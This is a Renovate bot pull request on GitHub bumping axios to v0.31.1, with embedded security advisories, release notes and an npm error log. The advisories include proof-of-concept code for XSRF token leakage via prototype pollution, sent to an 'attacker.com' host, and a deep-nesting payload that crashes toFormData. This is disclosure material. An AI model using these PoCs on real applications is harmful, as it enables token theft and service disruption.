Skip to content

chore(deps): update dependency axios to v0.31.1 [security] - autoclosed#414

Closed
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-axios-vulnerability
Closed

chore(deps): update dependency axios to v0.31.1 [security] - autoclosed#414
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-axios-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Jul 1, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
axios (source) 0.21.20.31.1 age confidence

Axios: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in withXSRFToken Boolean Coercion

CVE-2026-42042 / GHSA-xx6v-rp6x-q39c

More information

Details

Vulnerability Disclosure: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in withXSRFToken Boolean Coercion
Summary

The Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker.

Severity: Medium (CVSS 5.4)
Affected Versions: All versions since withXSRFToken was introduced
Vulnerable Component: lib/helpers/resolveConfig.js:59
Environment: Browser-only (XSRF logic only runs when hasStandardBrowserEnv is true)

CWE
  • CWE-201: Insertion of Sensitive Information Into Sent Data
  • CWE-183: Permissive List of Allowed Inputs
CVSS 3.1

Score: 5.4 (Medium)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Metric Value Justification
Attack Vector Network PP triggered remotely via vulnerable dependency
Attack Complexity Low Once PP exists, single property assignment. Consistent with GHSA-fvcv-3m26-pcqx
Privileges Required None No authentication needed
User Interaction Required Victim must use browser with axios making cross-origin requests
Scope Unchanged Token leakage within browser context
Confidentiality Low XSRF token leaked — anti-CSRF token, not session token
Integrity Low Stolen XSRF token enables CSRF attacks (bypass CSRF protection only)
Availability None No availability impact
Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input when triggered via prototype pollution.

If an attacker can pollute Object.prototype.withXSRFToken with any truthy value (e.g., 1, "true", {}), Axios will automatically inherit this value during config merge. The truthy value short-circuits the same-origin check, causing the XSRF cookie value to be sent as a request header to every destination.

Vulnerable Code

File: lib/helpers/resolveConfig.js, lines 57-66

// Line 57: Function check — only applies if withXSRFToken is a function
withXSRFToken && utils.isFunction(withXSRFToken) && (withXSRFToken = withXSRFToken(newConfig));

// Line 59: The vulnerable condition
if (withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(newConfig.url))) {
//  ^^^^^^^^^^^^^^^^
//  When withXSRFToken = 1 (truthy non-boolean): this is true → short-circuits
//  isURLSameOrigin() is NEVER called → token sent to ANY origin
  const xsrfValue = xsrfHeaderName && xsrfCookieName && cookies.read(xsrfCookieName);
  if (xsrfValue) {
    headers.set(xsrfHeaderName, xsrfValue);
  }
}

Designed behavior:

  • true → always send token (explicit cross-origin opt-in)
  • false → never send token
  • undefined → send only for same-origin requests

Actual behavior for non-boolean truthy values (1, "false", {}, []):

  • All treated as truthy → same-origin check skipped → token sent everywhere
Proof of Concept
// Simulated prototype pollution from any vulnerable dependency
Object.prototype.withXSRFToken = 1;

// In browser with document.cookie = "XSRF-TOKEN=secret-csrf-token-abc123"
// Every axios request now includes: X-XSRF-TOKEN: secret-csrf-token-abc123
// Even to cross-origin hosts:
await axios.get('https://attacker.com/collect');
// → attacker receives the XSRF token in request headers
Verified PoC Output
withXSRFToken Value        Sends Token Cross-Origin  Expected
true (boolean)             YES                       Yes (opt-in)
false (boolean)            No                        No
undefined (default)        No                        No
1 (number)                 YES ← BUG                No
"false" (string)           YES ← BUG                No
{} (object)                YES ← BUG                No
[] (array)                 YES ← BUG                No

Prototype pollution:
  Object.prototype.withXSRFToken = 1
  config.withXSRFToken = 1 → leaks=true
  isURLSameOrigin() was NOT called (short-circuited)
Impact Analysis
  • XSRF Token Theft: Anti-CSRF token sent as header to attacker-controlled server, enabling CSRF attacks against the victim application
  • Universal Scope: A single Object.prototype.withXSRFToken = 1 affects every axios request in the application
  • Misconfiguration Risk: Developer writing withXSRFToken: "false" (string) instead of false (boolean) triggers the same issue without PP

Limitations:

  • Browser-only (XSRF logic runs only in hasStandardBrowserEnv)
  • XSRF tokens are anti-CSRF tokens, not session tokens — leakage enables CSRF but not direct session hijacking
  • Attacker still needs a way to deliver the forged request after obtaining the token
Recommended Fix

Use strict boolean comparison:

// FIXED: lib/helpers/resolveConfig.js
const shouldSendXSRF = withXSRFToken === true ||
  (withXSRFToken == null && isURLSameOrigin(newConfig.url));

if (shouldSendXSRF) {
  const xsrfValue = xsrfHeaderName && xsrfCookieName && cookies.read(xsrfCookieName);
  if (xsrfValue) {
    headers.set(xsrfHeaderName, xsrfValue);
  }
}
Resources
Timeline
Date Event
2026-04-15 Vulnerability discovered during source code audit
2026-04-16 Report revised: corrected CVSS, documented limitations
TBD Report submitted to vendor via GitHub Security Advisory

Severity

  • CVSS Score: 5.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Axios: unbounded recursion in toFormData causes DoS via deeply nested request data

CVE-2026-42039 / GHSA-62hf-57xw-28j9

More information

Details

Summary

toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError.

Details

lib/helpers/toFormData.js:210 defines an inner build(value, path) that recurses into every object/array child (line 225: build(el, path ? path.concat(key) : [key])). The only safeguard is a stack array used to detect circular references; there is no maximum depth and no try/catch around the recursion. Because build calls itself once per nesting level, a payload nested roughly 2000+ levels deep exhausts V8's call stack.

toFormData is the serializer behind FormData request bodies and AxiosURLSearchParams (used by buildURL when params is an object with URLSearchParams unavailable, see lib/helpers/buildURL.js:53 and lib/helpers/AxiosURLSearchParams.js:36). Any server-side code that forwards a client-supplied object into axios({ data, params }) therefore reaches the recursive walker with attacker-controlled depth.

The RangeError is thrown synchronously from inside forEach, escapes toFormData, and propagates out of the axios request call. In typical Express/Fastify request handlers this terminates the running request; in synchronous startup paths or worker threads it can crash the whole process.

PoC
import toFormData from 'axios/lib/helpers/toFormData.js';
import FormData from 'form-data';

function nest(depth) {
  let o = { leaf: 1 };
  for (let i = 0; i < depth; i++) o = { a: o };
  return o;
}

try {
  toFormData(nest(2500), new FormData());
} catch (e) {
  console.log(e.name + ': ' + e.message);
}
// RangeError: Maximum call stack size exceeded

Server-side reachability example:

// vulnerable proxy pattern
app.post('/forward', async (req, res) => {
  await axios.post('https://upstream/api', req.body); // req.body user-controlled
  res.send('ok');
});
// attacker POST /forward with {"a":{"a":{"a":... 2500 deep ...}}}
// -> toFormData build() overflows -> request handler crashes

Verified on axios 1.15.0 (latest, 2026-04-10), Node.js 20, 3/3 PoC runs reproduce the RangeError at depth 2500.

Impact

A remote, unauthenticated attacker who can influence an object passed to axios as request data or params triggers an uncaught RangeError inside the synchronous recursive walker. In server-side applications that proxy or re-send client JSON through axios this crashes the request handler and, in worker/cluster setups, the process. Fix by bounding recursion depth in toFormData's build function (reject or throw on depths beyond a configurable limit, e.g. 100) or rewriting the walker iteratively.

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

axios/axios (axios)

v0.31.1

Compare Source

This release backports a broad set of security hardenings from the v1 line — covering prototype-pollution defences, stream size enforcement, XSRF handling, URL null-byte encoding, and bounded FormData recursion — and drops committed dist/ artefacts along with Bower support.

⚠️ Breaking Changes & Deprecations

  • Bower & Committed dist/ Removed: dist/ bundles are no longer committed to the repo, and bower.json plus the Grunt package2bower task have been removed. CI still builds bundles before publish, so npm/yarn/pnpm consumers are unaffected; installs via Bower or directly from the git tree must migrate to npm or a CDN. (#​10747)

🔒 Security Fixes

  • Prototype Pollution in Header Merge (GHSA-6chq-wfr3-2hj9): Tightened isFormData to reject plain/null-prototype objects and require append, and guarded the Node HTTP adapter so data.getHeaders() is only merged when it is not inherited from Object.prototype. Blocks injected headers via polluted getHeaders. (#​10750)
  • Prototype Pollution in Config Merging (GHSA-pf86-5x62-jrwf): mergeConfig, defaults resolution, and the HTTP adapter now uses own-property checks for transport, env, Blob, formSerializer, and transforms arrays, and merged configs are returned as null-prototype objects. Prevents hijacking of the request flow through polluted prototypes. (#​10752)
  • FormData / Params Recursion DoS: Added a configurable maxDepth (default 100, Infinity disables) to toFormData and params serialisation, throwing AxiosError with code ERR_FORM_DATA_DEPTH_EXCEEDED when exceeded. Circular-reference detection is preserved. (#​10728)
  • Null-Byte Injection in Query Strings: Removed the unsafe %00 → null-byte substitution from AxiosURLSearchParams.encode so %00 is preserved as-is. Other encoding behaviour (including %20+) unchanged. (#​10737)
  • Consolidated v1 Security Backport: Rolls up remaining v1 hardenings into v0.x: maxContentLength enforcement for responseType: 'stream' via a guarded transform with deferred piping, maxBodyLength enforcement for streamed uploads on native http/https with maxRedirects: 0, and stricter withXSRFToken handling so only own boolean true enables cross-origin XSRF headers. (#​10764)

🔧 Maintenance & Chores

  • CODEOWNERS: Added .github/CODEOWNERS with * @&#8203;jasonsaayman to set a default reviewer for all paths. (#​10740)

Full Changelog

v0.31.0

Compare Source

This release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and zizmor scanning, resolves TypeScript typing issues in AxiosInstance, and fixes a performance regression in isEmptyObject().

🔒 Security Fixes

  • Header Injection & Proxy Bypass: Backports v1 security hardening — sanitizes outgoing header values to strip invalid bytes, CRLF sequences, and boundary whitespace (including array values); adds proper NO_PROXY/no_proxy enforcement covering wildcards, explicit ports, loopback aliases (localhost, 127.0.0.1, ::1), bracketed IPv6, and trailing-dot hostnames. Proxy bypass is now checked before the proxy URL is parsed, and parsed.host is used for correct port and IPv6 handling. (#​10688)

  • CI Security: SHA-pins all actions and disables credential persistence in v0.x CI, introduces zizmor security scanning with SARIF upload to code scanning, adds an OIDC Trusted Publishing workflow with npm provenance attestations, and gates all publishes behind a required npm-publish GitHub Environment with configurable reviewer protections. (#​10638, #​10639, #​10667)

🐛 Bug Fixes

  • TypeScript — AxiosInstance Return Types: Fixes return types in AxiosInstance methods to correctly resolve to Promise<R> (matching AxiosPromise<T> semantics), and corrects the generic call signature so TypeScript properly enforces the response data type. TypeScript-only changes; no runtime impact. (#​6253, #​7328)

  • Performance: Fixes a performance regression in isEmptyObject() that caused excessive computation when the argument was a large string. (#​6484)

🔧 Maintenance & Chores

  • Versioning & CI Workflow: Adds an automated versioning flow for v0.x, renames the CI workflow for consistency with the v1.x naming convention, and corrects the branch name reference in CI config. (#​10690, #​10691, #​10692)

🌟 New Contributors

We are thrilled to welcome our new contributors. Thank you for helping improve axios:

Full Changelog

v0.30.3: Release notes - v0.30.3

Compare Source

This is a critical security maintenance release for the v0.x branch. It addresses a high-priority vulnerability involving prototype pollution that could lead to a Denial of Service (DoS).

Recommendation: All users currently on the 0.x release line should upgrade to this version immediately to ensure environment stability.

🛡️ Security Fixes

  • Backport: Fix DoS via proto key in merge config
    • Patched a vulnerability where specifically crafted configuration objects using the proto key could cause a Denial of Service during the merge process. - by @​FeBe95 in PR #​7388

⚙️ Maintenance & CI

  • CI Infrastructure Update
    • Updated Continuous Integration workflows for the v0.x branch to maintain long-term support and build reliability. - by @​jasonsaayman in PR #​7407

⚠️ Breaking Changes

Configuration Merging Behavior:

As part of the security fix, Axios now restricts the merging of the proto key within configuration objects. If your codebase relies on unconventional deep-merging patterns that target the object prototype via Axios config, those operations will now be blocked. This is a necessary change to prevent prototype pollution.

Full Changelog: v0.30.2...v0.30.3

v0.30.2

Compare Source

What's Changed

New Contributors

Full Changelog: axios/axios@v0.30.1...v0.30.2

v0.30.1

Compare Source

Release notes:

Bug Fixes
Contributors to this release

Full Changelog: axios/axios@v0.30.0...v0.30.1

v0.30.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

Full Changelog: axios/axios@v0.29.0...v0.30.0

v0.29.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

v0.28.1

Compare Source

Release notes:

Release notes:

Bug Fixes
  • fix(backport): custom params serializer support (#​6263)
  • fix(backport): uncaught ReferenceError req is not defined (#​6307)

v0.28.0

Compare Source

Release notes:

Bug Fixes
Backports from v1.x:
  • Allow null indexes on formSerializer and paramsSerializer v0.x (#​4961)
  • Fixing content-type header repeated #​4745
  • Fixed timeout error message for HTTP 4738
  • Added axios.formToJSON method (#​4735)
  • URL params serializer (#​4734)
  • Fixed toFormData Blob issue on node>v17 #​4728
  • Adding types for progress event callbacks #​4675
  • Fixed max body length defaults #​4731
  • Added data URL support for node.js (#​4725)
  • Added isCancel type assert (#​4293)
  • Added the ability for the url-encoded-form serializer to respect the formSerializer config (#​4721)
  • Add string[] to AxiosRequestHeaders type (#​4322)
  • Allow type definition for axios instance methods (#​4224)
  • Fixed AxiosError stack capturing; (#​4718)
  • Fixed AxiosError status code type; (#​4717)
  • Adding Canceler parameters config and request (#​4711)
  • fix(types): allow to specify partial default headers for instance creation (#​4185)
  • Added blob to the list of protocols supported by the browser (#​4678)
  • Fixing Z_BUF_ERROR when no content (#​4701)
  • Fixed race condition on immediate requests cancellation (#​4261)
  • Added a clear() function to the request and response interceptors object so a user can ensure that all interceptors have been removed from an Axios instance #​4248
  • Added generic AxiosAbortSignal TS interface to avoid importing AbortController polyfill (#​4229)
  • Fix TS definition for AxiosRequestTransformer (#​4201)
  • Use type alias instead of interface for AxiosPromise (#​4505)
  • Include request and config when creating a CanceledError instance (#​4659)
  • Added generic TS types for the exposed toFormData helper (#​4668)
  • Optimized the code that checks cancellation (#​4587)
  • Replaced webpack with rollup (#​4596)
  • Added stack trace to AxiosError (#​4624)
  • Updated AxiosError.config to be optional in the type definition (#​4665)
  • Removed incorrect argument for NetworkError constructor (#​4656)

v0.27.2

Compare Source

Fixes and Functionality:

  • Fixed FormData posting in browser environment by reverting #​3785 (#​4640)
  • Enhanced protocol parsing implementation (#​4639)
  • Fixed bundle size

v0.27.1

Compare Source

Fixes and Functionality:
  • Removed import of url module in browser build due to huge size overhead and builds being broken (#​4594)
  • Bumped follow-redirects to ^1.14.9 (#​4615)

v0.27.0

Compare Source

Breaking changes:
  • New toFormData helper function that allows the implementor to pass an object and allow axios to convert it to FormData (#​3757)
  • Removed functionality that removed the the Content-Type request header when passing FormData (#​3785)
  • (*) Refactored error handling implementing AxiosError as a constructor, this is a large change to error handling on the whole (#​3645)
  • Separated responsibility for FormData instantiation between transformRequest and toFormData (#​4470)
  • (*) Improved and fixed multiple issues with FormData support (#​4448)
QOL and DevX improvements:
  • Added a multipart/form-data testing playground allowing contributors to debug changes easily (#​4465)
Fixes and Functionality:
  • Refactored project file structure to avoid circular imports (#​4515) & (#​4516)
  • Bumped follow-redirects to ^1.14.9 (#​4562)
Internal and Tests:
  • Updated dev dependencies to latest version
Documentation:
  • Fixing incorrect link in changelog (#​4551)
Notes:
  • (*) Please read these pull requests before updating, these changes are very impactful and far reaching.

v0.26.1

Compare Source

Fixes and Functionality:
  • Refactored project file structure to avoid circular imports (#​4220)

v0.26.0

Compare Source

Fixes and Functionality:
  • Fixed The timeoutErrorMessage property in config not work with Node.js (#​3581)
  • Added errors to be displayed when the query parsing process itself fails (#​3961)
  • Fix/remove url required (#​4426)
  • Update follow-redirects dependency due to Vulnerability (#​4462)
  • Bump karma from 6.3.11 to 6.3.14 (#​4461)
  • Bump follow-redirects from 1.14.7 to 1.14.8 (#​4473)

v0.25.0

Compare Source

Breaking changes:
  • Fixing maxBodyLength enforcement (#​3786)
  • Don't rely on strict mode behaviour for arguments (#​3470)
  • Adding error handling when missing url (#​3791)
  • Update isAbsoluteURL.js removing escaping of non-special characters (#​3809)
  • Use native Array.isArray() in utils.js (#​3836)
  • Adding error handling inside stream end callback (#​3967)
Fixes and Functionality:
  • Added aborted even handler (#​3916)
  • Header types expanded allowing boolean and number types (#​4144)
  • Fix cancel signature allowing cancel message to be undefined (#​3153)
  • Updated type checks to be formulated better (#​3342)
  • Avoid unnecessary buffer allocations (#​3321)
  • Adding a socket handler to keep TCP connection live when processing long living requests (#​3422)
  • Added toFormData helper function (#​3757)
  • Adding responseEncoding prop type in AxiosRequestConfig (#​3918)
Internal and Tests:
  • Adding axios-test-instance to ecosystem (#​3786)
  • Optimize the logic of isAxiosError (#​3546)
  • Add tests and documentation to display how multiple inceptors work (#​3564)
  • Updating follow-redirects to version 1.14.7 (#​4379)
Documentation:
  • Fixing changelog to show corrext pull request (#​4219)
  • Update upgrade guide for https proxy setting (#​3604)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.24.0

Compare Source

Breaking changes:
  • Revert: change type of AxiosResponse to any, please read lengthy discussion here: (#​4141) pull request: (#​4186)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.23.0

Compare Source

Breaking changes:
  • Distinguish request and response data types (#​4116)
  • Change never type to unknown (#​4142)
  • Fixed TransitionalOptions typings (#​4147)
Fixes and Functionality:
  • Adding globalObject: 'this' to webpack config (#​3176)
  • Adding insecureHTTPParser type to AxiosRequestConfig (#​4066)
  • Fix missing semicolon in typings (#​4115)
  • Fix response headers types (#​4136)
Internal and Tests:
  • Improve timeout error when timeout is browser default (#​3209)
  • Fix node version on CI (#​4069)
  • Added testing to TypeScript portion of project (#​4140)
Documentation:
  • Rename Angular to AngularJS (#​4114)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.22.0

Compare Source

Fixes and Functionality:
  • Caseless header comparing in HTTP adapter (#​2880)
  • Avoid package.json import fixing issues and warnings related to this (#​4041), (#​4065)
  • Fixed cancelToken leakage and added AbortController support (#​3305)
  • Updating CI to run on release branches
  • Bump follow redirects version
  • Fixed default transitional config for custom Axios instance; (#​4052)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.21.4

Compare Source

Fixes and Functionality:
  • Fixing JSON transform when data is stringified. Providing backward compatibility and complying to the JSON RFC standard (#​4020)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.21.3

Compare Source

Fixes and Functionality:
  • Fixing response interceptor not being called when request interceptor is attached (#​4013)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate

renovate Bot commented Jul 1, 2026

Copy link
Copy Markdown
Contributor Author

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: package-lock.json
npm ERR! code ERESOLVE
npm ERR! ERESOLVE could not resolve
npm ERR! 
npm ERR! While resolving: @hot-loader/react-dom@17.0.0
npm ERR! Found: react@17.0.1
npm ERR! node_modules/react
npm ERR!   react@"17.0.1" from the root project
npm ERR!   peer react@">=16.3.0" from @emotion/core@10.0.35
npm ERR!   node_modules/@emotion/core
npm ERR!     peer @emotion/core@"^10.0.27" from @emotion/styled@10.0.27
npm ERR!     node_modules/@emotion/styled
npm ERR!       peer @emotion/styled@"^10.0.14" from gatsby-interface@0.0.193
npm ERR!       node_modules/gatsby-interface
npm ERR!         gatsby-interface@"^0.0.193" from gatsby-recipes@0.2.33
npm ERR!         node_modules/gatsby-recipes
npm ERR!       1 more (gatsby-recipes)
npm ERR!     peer @emotion/core@"^10.0.28" from @emotion/styled-base@10.0.31
npm ERR!     node_modules/@emotion/styled-base
npm ERR!       @emotion/styled-base@"^10.0.27" from @emotion/styled@10.0.27
npm ERR!       node_modules/@emotion/styled
npm ERR!         peer @emotion/styled@"^10.0.14" from gatsby-interface@0.0.193
npm ERR!         node_modules/gatsby-interface
npm ERR!         1 more (gatsby-recipes)
npm ERR!     3 more (gatsby-interface, gatsby-recipes, theme-ui)
npm ERR!   14 more (@emotion/styled, @emotion/styled-base, ...)
npm ERR! 
npm ERR! Could not resolve dependency:
npm ERR! peer react@"17.0.0" from @hot-loader/react-dom@17.0.0
npm ERR! node_modules/@hot-loader/react-dom
npm ERR!   dev @hot-loader/react-dom@"17.0.0" from the root project
npm ERR! 
npm ERR! Conflicting peer dependency: react@17.0.0
npm ERR! node_modules/react
npm ERR!   peer react@"17.0.0" from @hot-loader/react-dom@17.0.0
npm ERR!   node_modules/@hot-loader/react-dom
npm ERR!     dev @hot-loader/react-dom@"17.0.0" from the root project
npm ERR! 
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force, or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.
npm ERR! 
npm ERR! See /runner/cache/others/npm/eresolve-report.txt for a full report.

npm ERR! A complete log of this run can be found in:
npm ERR!     /runner/cache/others/npm/_logs/2026-07-01T01_03_43_057Z-debug-0.log

@netlify

netlify Bot commented Jul 1, 2026

Copy link
Copy Markdown

Deploy preview failed at Netlify. @jimmyandrade take a look please

Name Link
🔨 Latest commit f3bca18
🔍 Latest deploy log https://app.netlify.com/projects/multei/deploys/6a44677d17c48d00081b1a9f

@renovate renovate Bot changed the title chore(deps): update dependency axios to v0.31.1 [security] chore(deps): update dependency axios to v0.31.1 [security] - autoclosed Jul 1, 2026
@renovate renovate Bot closed this Jul 1, 2026
@renovate
renovate Bot deleted the renovate/npm-axios-vulnerability branch July 1, 2026 23:42
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants